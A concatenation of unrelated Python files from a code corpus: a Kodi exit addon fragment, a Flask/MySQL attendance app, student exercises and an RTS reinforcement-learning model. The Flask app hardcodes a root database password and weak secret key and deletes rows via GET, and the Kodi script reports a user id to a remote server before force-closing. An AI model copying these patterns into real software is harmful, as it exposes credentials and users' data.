xbmc.sleep(1000)\n if os.path.exists(iddata):\n with open(iddata, 'r') as mymega:\n userid=mymega.read()\n try: response = urllib2.urlopen('http://megatvbox.co.uk/TV-DATA/auth2.php?id='+str(userid)+'&die=1').read()\n except: pass\n xbmc.executebuiltin('ActivateWindow(10001,\"plugin://plugin.close.kodi/?description&fanart=C%3a%5cUsers%5cbigla%5cAppData%5cRoaming%5cKodi%5caddons%5cplugin.close.kodi%5cfanart.jpg&iconimage=C%3a%5cUsers%5cbigla%5cAppData%5cRoaming%5cKodi%5caddons%5cplugin.close.kodi%5cresources%5cart%5cforce.png&mode=10&name=Close%20System%20(Recommended)&url=fclose\",return)')\n\nmenuoptions()","sub_path":"zips/script.mtvbexit/addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257724421","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\napp.secret_key = 'many 
random bytes'\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'ghuanying1115'\napp.config['MYSQL_DB'] = 'rfid'\n\nmysql = MySQL(app)\n\n\n@app.route('/')\ndef Index():\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM attendance\")\n data = cur.fetchall()\n cur.close()\n\n return render_template('index2.html', attendance=data)\n\n\n@app.route('/insert', methods=['POST', 'GET'])\ndef insert():\n if request.method == \"POST\":\n flash(\"Data Inserted Successfully\")\n id = request.form['id']\n name = request.form['name']\n date = request.form['date']\n time = request.form['time']\n status = request.form['status']\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO attendance (id, name, date, time, status) VALUES (%s, %s, %s, %s, %s)\", (id, name, date, time, status))\n mysql.connection.commit()\n return redirect(url_for('Index'))\n\n\n@app.route('/delete/////', methods=['GET'])\ndef delete(id, name, date, time, status):\n flash(\"Record Has Been Deleted Successfully\")\n cur = mysql.connection.cursor()\n cur.execute(\"DELETE FROM attendance WHERE id=%s and name=%s and date=%s and time=%s and status=%s\",\n (id, name, date, time, status))\n mysql.connection.commit()\n return redirect(url_for('Index'))\n\n\n@app.route('/update', methods=['POST', 'GET'])\ndef update():\n if request.method == 'POST':\n old_id = request.form['old_id']\n old_name = request.form['old_name']\n old_date = request.form['old_date']\n old_time = request.form['old_time']\n old_status = request.form['old_status']\n new_id = request.form['id']\n new_name = request.form['name']\n new_date = request.form['date']\n new_time = request.form['time']\n new_status = request.form['status']\n cur = mysql.connection.cursor()\n cur.execute(\"\"\"\n UPDATE attendance\n SET id=%s, name=%s, date=%s, time=%s, status=%s\n WHERE id=%s and name=%s and date=%s and time=%s and status=%s\n \"\"\", (new_id, new_name, new_date, new_time, new_status, old_id, old_name, old_date, old_time, old_status))\n flash(\"Data Updated Successfully\")\n mysql.connection.commit()\n return redirect(url_for('Index'))\n\n\nif __name__ == \"__main__\":\n app.run(host='192.168.0.166')\n","sub_path":"pythonProject/pythonProject/Attendance Web/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175301928","text":"# Patrick Kunst\n# CSC 242\n# hw6.py\n\nfrom web import LinkCollector\nfrom html.parser import HTMLParser\nfrom urllib.request import urlopen\nfrom urllib.parse import urljoin\nfrom urllib.error import URLError\n\nclass ImageCollector(HTMLParser):\n\n def __init__(self, url):\n HTMLParser.__init__(self)\n self.url = url\n self.images = set()\n\n def handle_starttag(self, tag, attrs):\n if tag=='img':\n for attr, val in attrs:\n if attr=='src':\n self.images.add(urljoin(self.url, val))\n\n def getImages(self):\n return self.images\n\nfrom web import Crawler\n\nclass ImageCrawler(Crawler):\n\n def __init__(self):\n Crawler.__init__(self)\n self.img = set()\n\n def crawl(self, url, depth, relativeOnly=True):\n ic = ImageCollector(url)\n try:\n ic.feed(urlopen(url).read().decode())\n except(URLError, UnicodeDecodeError):\n pass\n\n self.img.update(ic.getImages())\n\n Crawler.crawl(self, url, depth, relativeOnly)\n\n \n def getImages(self):\n return self.img\n\n\ndef scrapeImages(url, filename, depth, relativeOnly=True):\n file = open(filename, 
'w')\n\n if depth>0:\n ic = ImageCrawler()\n ic.crawl(url, depth, relativeOnly)\n\n for img in ic.getImages():\n file.write('')\n\n scrapeImages(url, filename, depth-1, relativeOnly)\n\n\n\nif __name__=='__main__':\n import doctest\n print(doctest.testfile('hw6TEST.py'))\n \n\n\n\n\n\n\n\n\n \n","sub_path":"hw6.py","file_name":"hw6.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642732387","text":"# Copyright (c) 2017-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree. An additional grant\n# of patent rights can be found in the PATENTS file in the same directory.\n\nimport torch\nimport torch.nn as nn\nfrom collections import Counter\n\nfrom rlpytorch import Model, ActorCritic\n\nclass MiniRTSNet(Model):\n def __init__(self, args):\n # this is the place where you instantiate all your modules\n # you can later access them using the same names you've given them in here\n super(MiniRTSNet, self).__init__(args)\n self._init(args)\n\n def _init(self, args):\n self.m = args.params[\"num_unit_type\"] + 7\n self.pool = nn.MaxPool2d(2, 2)\n\n # self.arch = \"ccpccp\"\n # self.arch = \"ccccpccccp\"\n if self.args.arch[0] == \"\\\"\" and self.args.arch[-1] == \"\\\"\":\n self.arch = self.args.arch[1:-1]\n else:\n self.arch = self.args.arch\n self.arch, channels = self.arch.split(\";\")\n\n self.num_channels = []\n for v in channels.split(\",\"):\n if v == \"-\":\n self.num_channels.append(self.m)\n else:\n self.num_channels.append(int(v))\n\n self.convs = [ nn.Conv2d(self.num_channels[i], self.num_channels[i+1], 3, padding = 1) for i in range(len(self.num_channels)-1) ]\n for i, conv in enumerate(self.convs):\n setattr(self, \"conv%d\" % (i + 1), conv)\n\n self.relu = nn.ReLU() if self._no_leaky_relu() else nn.LeakyReLU(0.1)\n\n if not self._no_bn():\n self.convs_bn = [ nn.BatchNorm2d(conv.out_channels) for conv in self.convs ]\n for i, conv_bn in enumerate(self.convs_bn):\n setattr(self, \"conv%d_bn\" % (i + 1), conv_bn)\n\n def _no_bn(self):\n return getattr(self.args, \"disable_bn\", False)\n\n def _no_leaky_relu(self):\n return getattr(self.args, \"disable_leaky_relu\", False)\n\n def forward(self, input, res):\n # BN and LeakyReLU are from Wendy's code.\n x = input.view(input.size(0), self.m, 20, 20)\n\n counts = Counter()\n for i in range(len(self.arch)):\n if self.arch[i] == \"c\":\n c = counts[\"c\"]\n x = self.convs[c](x)\n if not self._no_bn(): x = self.convs_bn[c](x)\n x = self.relu(x)\n counts[\"c\"] += 1\n elif self.arch[i] == \"p\":\n x = self.pool(x)\n\n x = x.view(x.size(0), -1)\n return x\n\nclass Model_ActorCritic(Model):\n def __init__(self, args):\n super(Model_ActorCritic, self).__init__(args)\n self._init(args)\n\n def _init(self, args):\n params = args.params\n assert isinstance(params[\"num_action\"], int), \"num_action has to be a number. 
action = \" + str(params[\"num_action\"])\n self.params = params\n self.net = MiniRTSNet(args)\n\n if self.params.get(\"model_no_spatial\", False):\n self.num_unit = params[\"num_unit_type\"]\n linear_in_dim = (params[\"num_unit_type\"] + 7)\n else:\n linear_in_dim = (params[\"num_unit_type\"] + 7) * 25\n\n self.linear_policy = nn.Linear(linear_in_dim, params[\"num_action\"])\n self.linear_value = nn.Linear(linear_in_dim, 1)\n self.softmax = nn.Softmax()\n\n def get_define_args():\n return [\n (\"arch\", \"ccpccp;-,64,64,64,-\")\n ]\n\n def forward(self, x):\n if self.params.get(\"model_no_spatial\", False):\n # Replace a complicated network with a simple retraction.\n # Input: batchsize, channel, height, width\n xreduced = x[\"s\"].sum(2).sum(3).squeeze()\n xreduced[:, self.num_unit:] /= 20 * 20\n output = self._var(xreduced)\n else:\n s, res = x[\"s\"], x[\"res\"]\n output = self.net(self._var(s), self._var(res))\n\n policy = self.softmax(self.linear_policy(output))\n value = self.linear_value(output)\n return value, dict(V=value, pi=policy)\n\n# Format: key, [model, method]\n# if method is None, fall back to default mapping from key to method\nModels = {\n \"actor_critic\": [Model_ActorCritic, ActorCritic],\n}\n","sub_path":"rts/game_MC/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"242643059","text":"# 从excel读入数据存为data\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndata = pd.read_excel('../data/questionnaire2.xlsx', sheet_name=0)\r\n# data = pd.read_excel('../data/all.xlsx', sheet_name=0)\r\nprint(data.head())\r\nprint(len(data.index.values))\r\nprint(len(data.columns.values))\r\n\r\ndata_array = np.array(data)\r\nprint(data_array.shape[0], data_array.shape[1])\r\nprint(data_array[0])\r\n\r\n# 样本的one-hot编码\r\nwith open('../data/q2_pre_data.data', 'w') as all_feature:\r\n for i in range(data_array.shape[0]):\r\n data_line = ''\r\n for j in range(data_array.shape[1]):\r\n value = str(int(data_array[i][j]))\r\n data_line = data_line + value +'\\t'\r\n data_line = data_line+'\\n'\r\n all_feature.write(data_line)\r\n # print(data_line)\r\n\r\n\r\n\r\n\r\n","sub_path":"wordSequence/pretreatment/excel2data.py","file_name":"excel2data.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"530721107","text":"class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def maxDepth(self,root):\n if not root:\n return 0\n else:\n return 1 + max(self.maxDepth(root.left), self.maxDepth(root.right))\n\n\ntree = TreeNode([3,9,20,0,0,15,7])\nresult = Solution()\nprint(result.maxDepth(tree))","sub_path":"MaximumDepthofBinaryTree.py","file_name":"MaximumDepthofBinaryTree.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243062896","text":"N,K=map(int,input().strip().split())\n\nc=0\nfor n in range(1,N+1):\n if n>K:\n c+=1/N\n else:\n cnt=0\n while n : 1.0\n# MinMaxScaler() : 1.0\n# StandardScaler() : 1.0\n# StandardScaler() : 1.0","sub_path":"AI/ml/m16_pipeline_RS3_wine.py","file_name":"m16_pipeline_RS3_wine.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45448592","text":"\"\"\"Indique como um 
troco deve ser dado utilizando-se um número mínimo de notas. Seu\nalgoritmo deve ler o valor da conta a ser paga e o valor do pagamento efetuado desprezando\nos centavos. Suponha que as notas para troco sejam as de 50, 20, 10, 5, 2 e 1 reais, e que\nnenhuma delas esteja em falta no caixa.\"\"\"\n\ndef troco(conta_paga, pagamento):\n\tnotas = {'50': 0, '20':0, '10':0, '5':0, '2':0, '1':0}\n\tresto = pagamento - conta_paga\n\tif(conta_paga == pagamento):\n\t\tprint('Não há troco. Pagamento efetuado corretamente.')\n\telif (conta_paga > pagamento):\n\t\tprint('Ainda faltam '+str(resto)+' reais a serem pagos.')\n\telse:\n\t\twhile resto > 0:\n\t\t\tif resto >= 50:\n\t\t\t\tresto -= 50\n\t\t\t\tnotas['50'] += 1\n\t\t\telif resto >= 20:\n\t\t\t\tresto -= 20\n\t\t\t\tnotas['20'] += 1\n\t\t\telif resto >= 10:\n\t\t\t\tresto -= 10\n\t\t\t\tnotas['10'] += 1\n\t\t\telif resto >= 5:\n\t\t\t\tresto -= 5\n\t\t\t\tnotas['5'] += 1\n\t\t\telif resto >= 2:\n\t\t\t\tresto -= 2\n\t\t\t\tnotas['2'] += 1\n\t\t\telse:\n\t\t\t\tresto -= 1\n\t\t\t\tnotas['1'] += 1\n\t\tprint(notas)\n\ntroco(351, 1000)","sub_path":"Lista-03/exec03b-02.py","file_name":"exec03b-02.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"318384499","text":"#unittest\n#Using setUp() to support multiple tests\n#The instance self.acc can be used in each new test.\nimport unittest\nfrom accountant import Accountant\nclass TestAccountant(unittest.TestCase):\n \"\"\"Tests for the class Accountant.\"\"\"\n def setUp(self):\n self.acc = Accountant()\n def test_initial_balance(self):\n # Default balance should be 0.\n self.assertEqual(self.acc.balance, 0)\n # Test non-default balance.\n acc = Accountant(100)\n self.assertEqual(acc.balance, 100)\n def test_deposit(self):\n # Test single deposit.\n self.acc.deposit(100)\n self.assertEqual(self.acc.balance, 100)\n # Test multiple deposits.\n self.acc.deposit(100)\n self.acc.deposit(100)\n self.assertEqual(self.acc.balance, 300)\n def test_withdrawal(self):\n # Test single withdrawal.\n self.acc.deposit(1000)\n self.acc.withdraw(100)\n self.assertEqual(self.acc.balance, 900)\nunittest.main()","sub_path":"Py/begginer/p16_4.py","file_name":"p16_4.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"598322251","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# License : GNU GPL v3 or later\n# Author : Aurélien DESBRIERES\n# Mail : aurelien@hackers.camp\n# Project : Octo Multi Turtle\n# Created on : Sat Nov 22 07:49:46 2014\n#\n# Write with Emacs-Nox\n#\n# References\n#\n# python3 env\n# octo turtle\n#\n# Course material\n#\n# MOOC INRIA Turtle - WWW - pydoc\n#\n\n\n# we need the turtle module\nimport turtle\n\n# avoid calling range for each square\nsides = ['east', 'north-east', 'north', 'south-west', 'west', 'south-est', 'south', 'south-west']\n\ndef octo(the_turtle, length):\n \"have the turtle draw a octo of side \"\n for side in sides:\n the_turtle.forward(length)\n the_turtle.left(45)\n\n# initialize\nwindow = turtle.Screen()\nwindow.title(\"Caroline, Chloe && Bob\")\n\n# create first turtle\ncaroline = turtle.Turtle()\ncaroline.color(\"hotpink\")\ncaroline.reset()\n\n# second turtle\nchloe = turtle.Turtle()\nchloe.color(\"lightgreen\")\nchloe.reset()\n\n# create third turtle\nbob = turtle.Turtle()\nbob.color(\"blue\")\nbob.reset()\n\n# alternate : turtle, twist and octo size\ncontexts = ((caroline, 
15, 100, ),\n (chloe, 60, 30 ),\n (bob, 40, 60 ),\n )\n# initialize alternating contexts\ncycle = len(contexts)\ncounter = -1\n\n# the callback triggered when a user clicks in x,y\ndef clicked(x, y):\n global counter\n counter += 1\n # alternate between the various contexts\n (turtle, twist, size) = contexts[counter % cycle]\n turtle.penup()\n turtle.goto(x, y)\n turtle.pendown()\n turtle.left(twist)\n octo(turtle, size)\n\n# arm callback\nturtle.onscreenclick(clicked)\n\n# user can quit by typing 'q'\nturtle.onkey(turtle.bye, 'q')\nturtle.listen()\n\n# read & dispatch events\nturtle.mainloop()\n","sub_path":"Octo3MultiTurtle.py","file_name":"Octo3MultiTurtle.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"644237829","text":"\"\"\"\nThis module implements functionality that allows user to view and change key mappings\n\"\"\"\n__author__ = 'Tomasz Rzepka'\nimport pygame\nfrom framework.state import State\nfrom pybomberman.menu import Item\nfrom pybomberman.configuration import configuration\nfrom framework import state_manager\n\nBLACK = (0, 0, 0)\nCRIMSON = (220, 20, 60)\npygame.init()\n\n\nclass KeyConfigState(State):\n \"\"\" This class implements State that allows user to view and change key mappings \"\"\"\n def __init__(self, width, height):\n self.width = width/2\n self.height = height/2\n self.current_player = 0\n self.selecting_key = False\n option_functions = (('Player <%d> keys' % (self.current_player+1),\n self.change_current_player),\n ('Action: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .action), self.select_key),\n ('Up key: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .up), self.select_key),\n ('Down key: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .down), self.select_key),\n ('Left key: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .left), self.select_key),\n ('Right key: ' +\n pygame.key.name(configuration.player_key_configs[self.current_player]\n .right), self.select_key),\n ('Go Back', state_manager.pop))\n self.items = []\n for i, item in enumerate(option_functions):\n self.items.append(Item(item, size=35))\n self.selected = 0\n\n for i, menu_item in enumerate(self.items):\n height = menu_item.height * len(self.items)\n if i == 0 or i == len(self.items)-1:\n x_coordinate = self.width - menu_item.width / 2\n else:\n x_coordinate = self.width - 200\n y_coordinate = self.height/2 - height/2 + i*2 + 2*i * menu_item.height\n menu_item.set_position(x_coordinate, y_coordinate)\n\n def select_key(self):\n \"\"\" Prepares key for new mapping \"\"\"\n self.items[self.selected].text = self.items[self.selected].text.rsplit(':', 1)[0]\n self.items[self.selected].text += \":
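The last record above is cut off inside KeyConfigState.select_key, before its key-capture logic. For context, here is a minimal sketch of how such a "press a key to rebind" step is commonly completed with pygame; this is an assumption for illustration only (the name capture_key is hypothetical and not from the truncated record):

import pygame

def capture_key():
    # Block until the next key press and return its keycode; the menu label
    # can then be refreshed with pygame.key.name(keycode), the same helper
    # the record above uses when building its option strings.
    while True:
        for event in pygame.event.get():
            if event.type == pygame.KEYDOWN:
                return event.key
            if event.type == pygame.QUIT:
                raise SystemExit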